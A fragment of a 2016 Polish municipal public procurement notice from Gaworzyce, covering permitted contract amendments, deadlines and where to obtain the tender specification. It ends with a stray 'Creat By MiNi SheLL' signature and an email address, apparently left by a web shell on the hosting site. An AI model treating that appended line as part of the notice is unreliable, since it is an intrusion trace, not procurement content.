2. Zamawiający wymaga od wykonawcy, aby zawarł z nim umowę w sprawie zamówienia  publicznego na warunkach podanych w projekcie z uwzględnieniem treści wybranej oferty. Umowa będzie zawarta na wykonanie całości przedmiotu zamówienia określonego w rozdziale II niniejszej SIWZ.
3. W związku z postanowieniami z art. 144 ust. 1 Pzp Zamawiający informuje, że przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, 
w zakresie i na warunkach określonych w § 12 ust. 4 i 5 projektu umowy, stanowiącego załącznik nr 1 do SIWZ tj: 4. Dopuszcza się możliwość zmiany terminów realizacji, określonych w § 2 ust.1 Umowy, w sytuacji wyjątkowej, będącej następstwem zaistnienia takich okoliczności, jak:
1) wady w dokumentacji, wymagające dodatkowego czasu na ich usunięcie przez projektanta;
2) siła wyższa lub szczególnie niekorzystne warunki atmosferyczne;
3) odkrycia, znaleziska, wykopaliska lub inne okoliczności, których nie można było przewidzieć w dniu zawarcia niniejszej umowy, uniemożliwiające dotrzymanie terminów umownych,
4) wystąpienie robót dodatkowych, nieobjętych zamówieniem podstawowym, niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
- z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów, lub
- wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego, 
a wykonanie zamówienia dodatkowego uniemożliwia wykonanie zamówienia podstawowego 
w terminie umownym,

5. Dopuszcza się możliwość zmiany kwoty wynagrodzenia umownego, określonego w § 3 ust. 1 
w następujących przypadkach:
1) ustawowa zmiana stawki podatku VAT na roboty objęte niniejszą umowa,
2) stwierdzenie przy odbiorze wad nie nadających się do usunięcia, gdy nie uniemożliwiają one użytkowania przedmiotu odbioru zgodnie z przeznaczeniem,
3) gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w szczególności Urzędem Marszałkowskim Województwa Dolnośląskiego, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia.
6. Dopuszcza się możliwość zmiany harmonogramu rzeczowo-finansowego, stanowiącego załącznik nr 1 do umowy, w przypadku, gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w szczególności Urzędem Marszałkowskim Województwa Dolnośląskiego, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gaworzyce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gaworzyce, 59-180 Gaworzyce, ul. Okrężna 85, pok. nr 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2016 godzina 10:00, miejsce: Urząd Gminy Gaworzyce, 59-180 Gaworzyce, ul. Okrężna 85, pokój nr 14 (sekretariat), do godz. 10:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com